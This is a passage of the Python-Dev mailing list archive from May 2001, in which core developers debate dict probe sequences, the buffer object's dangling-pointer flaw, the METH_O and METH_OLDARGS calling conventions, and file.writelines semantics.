  tokens, tail = scanner.scan("sum = 3*foo + 312.50 + bar")
  print tokens, `tail`

That prints

  ['sum', '=', '3', '*', 'foo', '+', '312.50', '+', 'bar'] ''

In return for that, how about *you* supply a works-on-Windows rewrite of test_urllib2.py? You know more about that than anyone, and the test has been failing for weeks. From MarkH at ActiveState.com Sun May 27 04:39:43 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Sun, 27 May 2001 12:39:43 +1000 Subject: [Python-Dev] strop vs. string In-Reply-To: Message-ID: [Tim] > The buffer object has been neglected for years: is that because it's in > prime shape, or because nobody cares about it enough to maintain it? My take is a little different. I think people could be convinced to care about it, and indeed I do. However, it has one fatal flaw, and no one seems to know what to do about it. The problem is the one best demonstrated with the array module - if you get a pointer to the buffer interface for an array object, but the array then resizes itself, the buffer pointer dangles. There have been a few attempts over time to raise the buffer profile, but this design flaw leaves people scratching their head - it is hard to press for adoption of a feature that has a known crash hiding away. However, addressing this problem is difficult. Guido appears unconvinced that buffer objects and interfaces are that worthwhile.
It appears no one else knows how to proceed in the face of this ambivalence - that describes my take even if no one else's. The-buffer-is-dead,-long-live-the-buffer ly, Mark. From tim.one at home.com Sun May 27 08:34:53 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 02:34:53 -0400 Subject: [Python-Dev] Next dict crusade Message-ID: I'm still trying to work off the backlog of ignored dict ideas. Way back here: http://mail.python.org/pipermail/python-dev/2000-December/011085.html Christian Tismer suggested using polynomial division instead of multiplication for generating the probe sequence, as a way to get all the bits of the hash code into play. The desirability of doing that is illustrated by, e.g., this program:

  def f(keys):
      from time import clock
      d = {}
      s = clock()
      for k in keys:
          d[k] = k
      f = clock()
      print "build time %.3f" % (f-s)
      s = clock()
      for k in keys:
          assert d.has_key(k)
      f = clock()
      print "search time %.3f" % (f-s)

  # Excellent performance.
  keys = range(20000)
  for i in range(5):
      f(keys)

  # Terrible performance; > 500x slower.
  keys = [i << 16 for i in range(20000)]
  for i in range(5):
      f(keys)

Christian had a very clever (cheap and effective) solution:

  Old algorithm (multiplication):
      shift the index left by 1
      if index > mask:
          xor the index with the generator polynomial

  New algorithm (division):
      if low bit of index set:
          xor the index with the generator polynomial
      shift the index right by 1

where "index" should really read "increment", and unlike today we do not mask off any of the bits of the initial increment (and that's what lets *all* the bits of the hash code come into play; there's no point to doing this otherwise). I've since discovered that it's got a fatal rare flaw: the new algorithm can generate a 0 increment, while the old algorithm cannot. Example: poly is 131 and hash is 145.
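The two update rules and the poly-131/hash-145 trap can be modelled in a few lines. This is a minimal sketch in modern Python 3, not the dictobject.c source: the 128-slot table (mask 127) and the helper names `old_step`, `new_step`, `initial_incr` and `old_cycle` are assumptions chosen for illustration. Because 131 encodes x**7 + x + 1, an irreducible polynomial, the old multiply-by-x rule cycles through all 127 nonzero values and never reaches 0, while a single division step applied to 131 lands on the fixed point 0.

```python
# Hypothetical model of the dict probe-increment updates discussed above.
# Assumed parameters: a 128-slot table (mask 127) with poly 131 = x**7 + x + 1.
POLY = 131
MASK = 127


def initial_incr(h):
    """New scheme: no masking, so every bit of the hash contributes."""
    return h ^ (h >> 3)


def old_step(incr, mask=MASK, poly=POLY):
    """Old rule (multiplication by x): shift left, reduce on overflow."""
    incr <<= 1
    if incr > mask:
        incr ^= poly  # clears bit 7 and folds in x + 1
    return incr


def new_step(incr, poly=POLY):
    """New rule (division by x): reduce if the low bit is set, shift right."""
    if incr & 1:
        incr ^= poly
    return incr >> 1


def old_cycle(start, count):
    """First `count` increments produced by the old rule from `start`."""
    seq = [start]
    while len(seq) < count:
        seq.append(old_step(seq[-1]))
    return seq


if __name__ == "__main__":
    print(len(set(old_cycle(1, 127))))  # 127: every nonzero value is visited
    incr = initial_incr(145)
    print(incr)                         # 131, i.e. equal to POLY
    print(new_step(incr))               # 0
    print(new_step(0))                  # 0 again: an infinite probe loop
```

The sketch only checks the arithmetic of the two rules; it does not model slot lookups or timing.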
Because we don't mask off any bits in computing the initial increment, the initial increment is computed as

  incr = hash ^ (hash >> 3) ==
         145 ^ (145 >> 3) ==
         145 ^ 18 ==
         131 ==
         poly

So if we don't hit on the first probe, the new

  if low bit of index set:
      xor the index with the generator polynomial
  shift the index right by 1

business sets incr to 0, and the result is an infinite loop (0 is a fixed point). I hate to add another branch to this. As is, the existing branch in both the old and new ways is of the worst possible kind: it's taken half the time, with a pseudo-random distribution. So there's not a branch-prediction gimmick on earth it won't fool. Note that there's no reasonable way to identify "bad values" for incr before the loop starts, either -- there's really no way to tell whether incr mod poly is 0 without a loop to do division steps until incr < poly (if incr < poly and incr != 0, incr can never become 0, so there's no more need to test after reaching that point). Such a "pre loop" would cost more than the existing loop in most cases, as we usually get out of the existing loop today on its first iteration. But in that case, what am I worried about ? time-for-a-checkin-ly y'rs - tim From martin at loewis.home.cs.tu-berlin.de Sun May 27 11:01:14 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v.
Loewis) Date: Sun, 27 May 2001 11:01:14 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B0F7D44.1A12CE0F@lemburg.com> (mal@lemburg.com) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> Message-ID: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> > To call these, the calling mechanism would have to cast these > to: > > foo(void *, void *, void *) > bar(void *, void *, void *, void *, void *) > > Wouldn't this work ? I think it would work, but I doubt it would save much compared to the existing approach. The main point of this patch is to improve efficiency, and (according to Jeremy's analysis), most of the time for calling a function is spent in PyArg_ParseTuple. So if we replace it with another interface that also relies on parsing a string, I doubt we'll improve efficiency. IOW, I won't implement that approach. If you do, I'd be curious to hear the results, of course. Regards, Martin P.S. There would still be cases where PyArg_ParseTuple is needed, e.g. for "O!". From mal at lemburg.com Sun May 27 12:26:27 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 27 May 2001 12:26:27 +0200 Subject: [Python-Dev] Special-casing "O" References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> Message-ID: <3B10D653.4D81E280@lemburg.com> "Martin v. Loewis" wrote: > > > To call these, the calling mechanism would have to cast these > > to: > > > > foo(void *, void *, void *) > > bar(void *, void *, void *, void *, void *) > > > > Wouldn't this work ?
> > I think it would work, but I doubt it would save much compared to the > existing approach. The main point of this patch is to improve > efficiency, and (according to Jeremy's analysis), most of the time for > calling a function is spent in PyArg_ParseTuple. So if we replace it > with another interface that also relies on parsing a string, I doubt > we'll improve efficiency. That's the point: we are not replacing PyArg_ParseTuple() with another parsing mechanism, we are only using PyArg_ParseTuple() as a fallback solution for parser strings for which we don't provide a special case implementation. The idea is to simply do a strcmp() (*) for a few common combinations (like e.g. "O" and "OO") and then provide the same special case handling as you do with e.g. METH_O. The result would be almost the same w/r to performance and code reduction as with your approach. The only addition would be using strcmp() instead of a switch statement. The advantage of this approach is that while you can still provide special case handling of common parser strings, you can also provide generic APIs for most other parser strings by falling back to PyArg_ParseTuple() for these. > IOW, I won't implement that approach. If you do, I'd be curious to > hear the results, of course. I'll see what I can do... > P.S. There would still be cases where PyArg_ParseTuple is needed, > e.g. for "O!". True... can't win 'em all ;-) -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Sun May 27 12:30:48 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 27 May 2001 12:30:48 +0200 Subject: [Python-Dev] strop vs.
string References: Message-ID: <3B10D758.3741AC2F@lemburg.com> Mark Hammond wrote: > > [Tim] > > The buffer object has been neglected for years: is that because it's in > > prime shape, or because nobody cares about it enough to maintain it? > > My take is a little different. I think people could be convinced to care > about it, and indeed I do. However, it has one fatal flaw, and no one seems > to know what to do about it. > > The problem is the one best demonstrated with the array module - if you get > a pointer to the buffer interface for an array object, but the array then > resizes itself, the buffer pointer dangles. I guess there are three ways to "solve" this:

  a) mutable types don't implement the getreadbuf interface
  b) the getreadbuf interface is complemented with a callback interface, so the buffer object can be notified of the change
  c) calling getreadbuf on a mutable object causes this object to become immutable

-- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jeremy at digicool.com Sun May 27 20:51:26 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Sun, 27 May 2001 14:51:26 -0400 (EDT) Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> Message-ID: <15121.19630.329909.482775@slothrop.digicool.com> >>>>> "MvL" == Martin v Loewis writes: MvL> to the existing approach.
The main point of this patch is to MvL> improve efficiency, and (according to Jeremy's analysis), most MvL> of the time for calling a function is spent in MvL> PyArg_ParseTuple. I'd like to qualify this a bit. What I reported earlier is that the BuiltinFunctionCall microbenchmark in pybench spends 30% of its time in PyArg_ParseTuple(). This strikes me as excessive, because it's a static property of the code. (One could imagine writing a Python script that parsed the "O!|is#" format strings and generated efficient, specialized C code for that format.) If we benchmark other programs, particularly those that do more work in the builtins, the relative cost of the argument processing will be lower. Jeremy From jeremy at digicool.com Sun May 27 20:55:36 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Sun, 27 May 2001 14:55:36 -0400 (EDT) Subject: [Python-Dev] Special-casing "O" In-Reply-To: References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> Message-ID: <15121.19880.775931.946049@slothrop.digicool.com> >>>>> "TP" == Tim Peters writes: TP> Do METH_O, convert every "O" function to use it, declare TP> victory, and enjoy the weekend . TP> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- TP> size-ly y'rs - tim How is METH_O different than METH_OLDARGS? The old-style argument passing is definitely the most efficient for functions of zero or one arguments. There's special-case code in ceval to support these cases -- fast_cfunction() -- primarily because in these cases the function can be invoked by using arguments directly from the Python stack instead of copying them to a tuple first. Jeremy From tim.one at home.com Sun May 27 22:37:43 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 16:37:43 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <15121.19880.775931.946049@slothrop.digicool.com> Message-ID: [Jeremy] > How is METH_O different than METH_OLDARGS? I have no idea: can you explain it?
The #define's for these symbols are uncommented, and it's a mystery to me what they're *supposed* to mean. > The old-style argument passing is definitely the most efficient for > functions of zero or one arguments. There's special-case code in > ceval to support these cases -- fast_cfunction() -- primarily > because in these cases the function can be invoked by using arguments > directly from the Python stack instead of copying them to a tuple > first. OK, I'm looking in bltinmodule.c, at builtin_len. It starts like so:

  static PyObject *
  builtin_len(PyObject *self, PyObject *args)
  {
      PyObject *v;
      long res;

      if (!PyArg_ParseTuple(args, "O:len", &v))
          return NULL;

So it's clearly expecting a tuple. But its entry in the builtin_methods[] table is:

  {"len", builtin_len, 1, len_doc},

That is, it says nothing about the calling convention. Since C fills in a 0 for missing values, and methodobject.c has

  /* Flag passed to newmethodobject */
  #define METH_OLDARGS  0x0000
  #define METH_VARARGS  0x0001
  #define METH_KEYWORDS 0x0002

then doesn't the struct for builtin_len implicitly specify METH_OLDARGS? But if that's true, and fast_cfunction() does not create a tuple in this case, how is it that builtin_len gets a tuple? Something doesn't add up here. Or does it? There's no *reference* to METH_OLDARGS anywhere in the code base other than its definition and its use in method tables, so whatever code *keys* off it must be assuming a hardcoded 0 value for it -- or indeed nothing keys off it at all. I expect this line in ceval.c is making the dirty assumption:

  } else if (flags == 0) {

and should be testing against METH_OLDARGS instead. But I see that builtin_len is falling into the METH_VARARGS case despite that it wasn't declared that way and that it sure looks like METH_OLDARGS (0) is the default. Confusing! Fix it .
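A toy model may help pin down what the flags being argued about mean at the call site. This is a hedged Python 3 sketch, not the ceval.c or methodobject.c code: the flag names come from the thread (METH_O being the proposed new one), while `dispatch_call`, `CallError` and `len_varargs` are hypothetical names, and the error-message wording is only modelled on the tracebacks quoted in the thread. It assumes the METH_OLDARGS rule that zero arguments arrive as NULL (None here), one argument arrives bare, and two or more arrive packed in a tuple.

```python
# Toy model of C-function calling conventions; all names here are hypothetical.


class CallError(TypeError):
    """Raised when a call does not match the callee's convention."""


def dispatch_call(name, func, flag, *args, **kwargs):
    """Deliver `args` to `func` the way each (modelled) METH_* flag would."""
    if kwargs:
        raise CallError(f"{name}() takes no keyword arguments")
    if flag == "METH_OLDARGS":
        # 0 args -> NULL (None), 1 arg -> passed bare, 2+ -> packed in a tuple.
        if not args:
            return func(None)
        if len(args) == 1:
            return func(args[0])
        return func(args)
    if flag == "METH_VARARGS":
        # The callee always gets the tuple and must unpack and check it itself.
        return func(args)
    if flag == "METH_O":
        # The dispatcher checks the count once; the callee gets one bare object.
        if len(args) != 1:
            raise CallError(f"{name}() takes exactly one argument ({len(args)} given)")
        return func(args[0])
    raise ValueError(f"unknown flag: {flag}")


def len_varargs(args):
    """Stand-in for a C function that calls PyArg_ParseTuple(args, "O:len", &v)."""
    if len(args) != 1:
        raise CallError(f"len() takes exactly 1 argument ({len(args)} given)")
    return len(args[0])


if __name__ == "__main__":
    # Under METH_OLDARGS the callee just sees whatever the dispatcher hands it.
    print(dispatch_call("len", len, "METH_OLDARGS", 1, 2))              # 2
    print(dispatch_call("len", len, "METH_OLDARGS", (1, 2)))            # 2
    print(dispatch_call("len", len_varargs, "METH_VARARGS", (1, 2)))    # 2
    print(dispatch_call("len", len, "METH_O", (1, 2)))                  # 2
    try:
        dispatch_call("len", len, "METH_O", 1, 2)
    except CallError as exc:
        print(exc)  # len() takes exactly one argument (2 given)
```

The first two calls show the ambiguity raised later in the thread: under METH_OLDARGS, len(1, 2) and len((1, 2)) hand the callee the same tuple, whereas the modelled METH_O rejects the first at dispatch time without parsing any format string.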
From tim.one at home.com Sun May 27 22:46:29 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 16:46:29 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: Message-ID: [Tim, thrashing] > ... > So it's clearly expecting a tuple. But its entry in the builtin_methods[] > table is: > > {"len", builtin_len, 1, len_doc}, > > That is, it says nothing about the calling convention. Oops, it does, using a hardcoded 1 instead of the METH_VARARGS #define. So that explains that. Next question: why isn't builtin_len using METH_OLDARGS instead? Is there some advantage to using METH_VARARGS in this case? This gets back to what these #defines are intended to *mean*, and I still haven't figured that out. From mwh at python.net Sun May 27 23:32:48 2001 From: mwh at python.net (Michael Hudson) Date: Sun, 27 May 2001 22:32:48 +0100 (BST) Subject: [Python-Dev] Special-casing "O" In-Reply-To: Message-ID: On Sun, 27 May 2001, Tim Peters wrote: > Next question: why isn't builtin_len using METH_OLDARGS instead? Is > there some advantage to using METH_VARARGS in this case? So you can't do >>> len(1,2) 2 a la list.append, socket.connect pre 2.0? (or was it 1.6?) My impression is that generally METH_VARARGS is saner than METH_OLDARGS (i.e. more consistent). It seems the proposed METH_O is basically METH_OLDARGS + the restriction that there is in fact only one argument, so we save a tuple allocation over METH_VARARGS, but get argument count checking over METH_OLDARGS. Cheers, M. From tim.one at home.com Mon May 28 00:49:38 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 18:49:38 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: Message-ID: [Tim] > Next question: why isn't builtin_len using METH_OLDARGS instead? Is > there some advantage to using METH_VARARGS in this case? [Michael Hudson] > So you can't do > > >>> len(1,2) > 2 > > a la list.append, socket.connect pre 2.0? (or was it 1.6?)
If I didn't know better, I'd suspect Python's internal calling conventions at the start didn't perfectly anticipate all future developments. Among other things, it looks like it's impossible for a METH_OLDARGS function to distinguish between being called with more than one argument and being called with a single tuple argument. > My impression is that generally METH_VARARGS is saner than METH_OLDARGS > (i.e. more consistent). Yes, METH_OLDARGS does appear to, well, suck. > It seems the proposed METH_O is basically METH_OLDARGS + the > restriction that there is in fact only one argument, so we save > a tuple allocation over METH_VARARGS, Also, and more importantly, save the PyArg_ParseTuple call on the receiving end. > but get argument count checking over METH_OLDARGS. Which is worth getting. I'm back to where I started here: Do METH_O, convert every "O" function to use it, declare victory, and enjoy the weekend. 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- size-ly y'rs - tim PS: But today I'll add another: add at least one comment to the code -- this stuff is a bitch to reverse-engineer. From thomas at xs4all.net Mon May 28 00:50:58 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Mon, 28 May 2001 00:50:58 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: ; from mwh@python.net on Sun, May 27, 2001 at 10:32:48PM +0100 References: Message-ID: <20010528005058.H690@xs4all.nl> On Sun, May 27, 2001 at 10:32:48PM +0100, Michael Hudson wrote: > On Sun, 27 May 2001, Tim Peters wrote: > > Next question: why isn't builtin_len using METH_OLDARGS instead? Is > > there some advantage to using METH_VARARGS in this case? > So you can't do > >>> len(1,2) > 2 > a la list.append, socket.connect pre 2.0? (or was it 1.6?) And don't forget the method-specific error message by passing ':len' in the format string.
Of course, this can easily be (and probably should be) done by passing another argument to whatever parses arguments in METH_O, rather than invoking string parsing magic every call. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From thomas at xs4all.net Mon May 28 00:58:30 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Mon, 28 May 2001 00:58:30 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: ; from tim.one@home.com on Sun, May 27, 2001 at 06:49:38PM -0400 References: Message-ID: <20010528005830.I690@xs4all.nl> On Sun, May 27, 2001 at 06:49:38PM -0400, Tim Peters wrote: > 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- > size-ly y'rs - tim And recycle a quote a day ;) > PS: But today I'll add another: add at least one comment to the code -- > this stuff is a bitch to reverse-engineer. But not just any comment, please! The Pine source code is riddled with calls to 'mm_critical(stream)', and each call I've seen so far is nicely commented with the utterly useless comment '/* go critical */'. I'd-gladly-trade-in-every-mm_critical-comment-for-one-comment-to-describe- -what-Pine-actually-tries-to-do-ly y'rs, -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From martin at loewis.home.cs.tu-berlin.de Mon May 28 00:45:53 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v.
Loewis) Date: Mon, 28 May 2001 00:45:53 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <15121.19630.329909.482775@slothrop.digicool.com> (message from Jeremy Hylton on Sun, 27 May 2001 14:51:26 -0400 (EDT)) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> <15121.19630.329909.482775@slothrop.digicool.com> Message-ID: <200105272245.f4RMjru01021@mira.informatik.hu-berlin.de> > I'd like to qualify this a bit. What I reported earlier is that the > BuiltinFunctionCall microbenchmark in pybench spends 30% of its time in > PyArg_ParseTuple(). This strikes me as excessive, because it's a > static property of the code. (One could imagine writing a Python > script that parsed the "O!|is#" format strings and generated > efficient, specialized C code for that format.) > > If we benchmark other programs, particularly those that do more work > in the builtins, the relative cost of the argument processing will be > lower. Certainly: if the work inside the function increases, the overhead of calling it will be less visible. What the benchmark shows, however, and what my patch addresses, is that the time for *calling* a function is primarily spent in PyArg_ParseTuple (and not in, say, building argument tuples, putting parameters on the stack, fetching function addresses, building method objects, and so on). Regards, Martin From tim.one at home.com Mon May 28 01:17:27 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 19:17:27 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <20010528005058.H690@xs4all.nl> Message-ID: [Thomas Wouters] > And don't forget the method-specific error message by passing ':len' in > the format string.
Of course, this can easily be (and probably should) > done by passing another argument to whatever parses arguments in > METH_O, rather than invoking string parsing magic every call. Martin's patch automatically inserts the name of the function in the TypeError it raises when a METH_O call doesn't get exactly one argument, or gets a (one or more) keyword argument. Stick to METH_O and it's a clear win, even in this respect: there's no info in an explicit ":len" he's not already deducing, and almost all instances of "O:name" formats today are exactly the same this way: if (!PyArg_ParseTuple(args, "O:abs", &v)) if (!PyArg_ParseTuple(args, "O:callable", &v)) if (!PyArg_ParseTuple(args, "O:id", &v)) if (!PyArg_ParseTuple(args, "O:hash", &v)) if (!PyArg_ParseTuple(args, "O:hex", &v)) if (!PyArg_ParseTuple(args, "O:float", &v)) if (!PyArg_ParseTuple(args, "O:len", &v)) if (!PyArg_ParseTuple(args, "O:list", &v)) else if (!PyArg_ParseTuple(args, "O:min/max", &v)) if (!PyArg_ParseTuple(args, "O:oct", &v)) if (!PyArg_ParseTuple(args, "O:ord", &obj)) if (!PyArg_ParseTuple(args, "O:reload", &v)) if (!PyArg_ParseTuple(args, "O:repr", &v)) if (!PyArg_ParseTuple(args, "O:str", &v)) if (!PyArg_ParseTuple(args, "O:tuple", &v)) if (!PyArg_ParseTuple(args, "O:type", &v)) Those are all the ones in bltinmodule.c, and nearly all of them are called extremely frequently in *some* programs. The only oddball is min/max, but then it supports more than one call-list format and so isn't a METH_O candidate anyway. Indeed, Martin's patch gives a *better* message than we get for some mistakes today: >>> len(val=2) Traceback (most recent call last): File "<stdin>", line 1, in ? TypeError: len() takes exactly 1 argument (0 given) >>> Martin's would say TypeError: len takes no keyword arguments in this case. He should add "()" after the function name.
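To make the METH_O convention concrete, here is a rough Python model of it. It is only a sketch: `meth_o` and `length` are made-up names, and the real check lives in C inside the interpreter's call machinery, not in a decorator. The point it illustrates is that the argument-count and keyword checks happen once, outside the function body, and the error message is built from the function's name, with the "()" suggested above:

```python
def meth_o(func):
    """Hypothetical model of METH_O dispatch: exactly one positional
    argument, no keywords, checked before the body ever runs."""
    name = func.__name__

    def wrapper(*args, **kwargs):
        if kwargs:
            raise TypeError("%s() takes no keyword arguments" % name)
        if len(args) != 1:
            raise TypeError("%s() takes exactly one argument (%d given)"
                            % (name, len(args)))
        # The body gets the object itself: no argument tuple to unpack
        # and no "O:name" format string to parse on every call.
        return func(args[0])

    wrapper.__name__ = name
    return wrapper


@meth_o
def length(obj):
    return len(obj)


print(length("abc"))        # 3
try:
    length(val=2)
except TypeError as exc:
    print(exc)              # length() takes no keyword arguments
```

The keyword check runs first, so `length(val=2)` reports the keyword problem rather than a misleading "(0 given)" count.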
He should also throw away the half of the patch complicating and slowing METH_O to get some theoretical speedup in other cases: make the one-arg builtins fly just as fast as humanly possible. From greg at cosc.canterbury.ac.nz Mon May 28 02:23:55 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Mon, 28 May 2001 12:23:55 +1200 (NZST) Subject: [Python-Dev] strop vs. string In-Reply-To: Message-ID: <200105280023.MAA00996@s454.cosc.canterbury.ac.nz> > However, it has one fatal flaw, and no one seems > to know what to do about it. I think it would be safe if: 1) it kept a reference to the underlying object, and 2) it re-fetched the pointer and length info each time it was needed, using the underlying object's buffer interface. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Mon May 28 02:28:41 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Mon, 28 May 2001 12:28:41 +1200 (NZST) Subject: [Python-Dev] strop vs. string In-Reply-To: <20010525132752.B5402@lyra.org> Message-ID: <200105280028.MAA01000@s454.cosc.canterbury.ac.nz> Greg Stein > "badly" is overstating the problem. It caches a pointer when it shouldn't. > This doesn't work well But "doesn't work well" means "can crash the interpreter". I don't think "badly" is an overstatement here... Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From tim.one at home.com Mon May 28 03:42:30 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 21:42:30 -0400 Subject: [Python-Dev] strop vs. 
string In-Reply-To: <3B10D758.3741AC2F@lemburg.com> Message-ID: [MAL] > I guess there are three ways to "solve" this: > > a) mutable types don't implement the getreadbuf interface Of the few types that implement it today, that would leave only strings (8-bit and Unicode). Too much machinery just for that. Besides, I once posted an example to c.l.py showing how to use regexps to search mmap'ed files, so *that* must continue to work forever . > b) the getreadbuf interface is complemented with a callback > interface, so that the buffer object can be notified of > the change I like this best, although there's no bound on the number of buffers that may need to be notified in case of change (i.e., the object would need to maintain a list of buffers to be notified). > c) calling getreadbuf on a mutable object causes this object > to become immutable Even easier, core dump as soon as getreadbuf is called . [Greg Ewing] > I think it would be safe if: > > 1) it kept a reference to the underlying object, and That much it already does. > 2) it re-fetched the pointer and length info each time it was > needed, using the underlying object's buffer interface. If after b = buffer(some_object) b.__getitem__ needed to refetch the info between b[i] and b[i+1] I expect it would be so slow even Greg wouldn't want it anymore. From tim.one at home.com Mon May 28 03:52:18 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 21:52:18 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0FD023.C4588919@lemburg.com> Message-ID: [Tim] > About combining strop and buffers and strings, don't forget > unicodeobject.c: that's got oodles of basically duplicate code too. > /F suggested dealing with the minor differences via maintaining one > code file that gets compiled multiple times w/ appropriate #defines. [MAL] > Hmm, that only saves us a few kB in source, but certainly not > in the object files. That's not the point.
Manually duplicated code blocks always get out of synch, as people fix bugs in, or enhance, one of them but don't even know about the others. /F brought this up after I pissed away a few hours trying to repair one of these in all places, and he noted that strop.replace() and string.replace() are woefully inefficient anyway. > The better idea would be making the types subclass from a generic > abstract string object -- I just don't know how this will be > possible with Guido's type patches. We'll just have to wait, > I guess. Wait for what? If it were possible, is the chance that you'd take time to rework unicodeobject.c to "subclass from a generic abstract string object" greater than 0? The chance that I would is exactly 0. From martin at loewis.home.cs.tu-berlin.de Mon May 28 08:36:49 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 28 May 2001 08:36:49 +0200 Subject: [Python-Dev] Special-casing "O" Message-ID: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> > How is METH_O different than METH_OLDARGS? METH_O will raise an exception if the function is called with more than one argument, without calling the function. METH_OLDARGS will pass a tuple in this case. I believe you cannot distinguish between a single tuple argument and an invocation with multiple arguments in a METH_OLDARGS function, is that true? Regards, Martin From martin at loewis.home.cs.tu-berlin.de Mon May 28 09:40:54 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 28 May 2001 09:40:54 +0200 Subject: [Python-Dev] file.writelines("foo\n","bar\n") Message-ID: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> When investigating calling conventions, I took a special look at METH_OLDARGS occurrences. While most of them look reasonable, file.writelines caught my attention. 
It has if (args == NULL || !PySequence_Check(args)) { PyErr_SetString(PyExc_TypeError, "writelines() argument must be a sequence of strings"); return NULL; } Because it is a METH_OLDARGS method, you can do f=open("/tmp/x","w") f.writelines("foo\n","bar\n") With my upcoming patches, I'd replace this with METH_O, making this call illegal. Does anybody see a problem with that change in semantics? Regards, Martin From thomas at xs4all.net Mon May 28 10:17:58 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Mon, 28 May 2001 10:17:58 +0200 Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 28, 2001 at 09:40:54AM +0200 References: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> Message-ID: <20010528101758.K690@xs4all.nl> On Mon, May 28, 2001 at 09:40:54AM +0200, Martin v. Loewis wrote: > When investigating calling conventions, I took a special look at > METH_OLDARGS occurrences. While most of them look reasonable, > file.writelines caught my attention. It has > if (args == NULL || !PySequence_Check(args)) { > PyErr_SetString(PyExc_TypeError, > "writelines() argument must be a sequence of strings"); > return NULL; > } > Because it is a METH_OLDARGS method, you can do > f=open("/tmp/x","w") > f.writelines("foo\n","bar\n") > With my upcoming patches, I'd replace this with METH_O, making this > call illegal. Does anybody see a problem with that change in > semantics? Hell yeah. About the same problem as with the 'l.append("foo", "bar")' problem in 1.5.2 -> [1.6, 2.x]. Oddly enough, this behaviour was added in 2.0, by converting a PyList_Check into a PySequence_Check: $ python1.5 >>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n") Traceback (innermost last): File "<stdin>", line 1, in ?
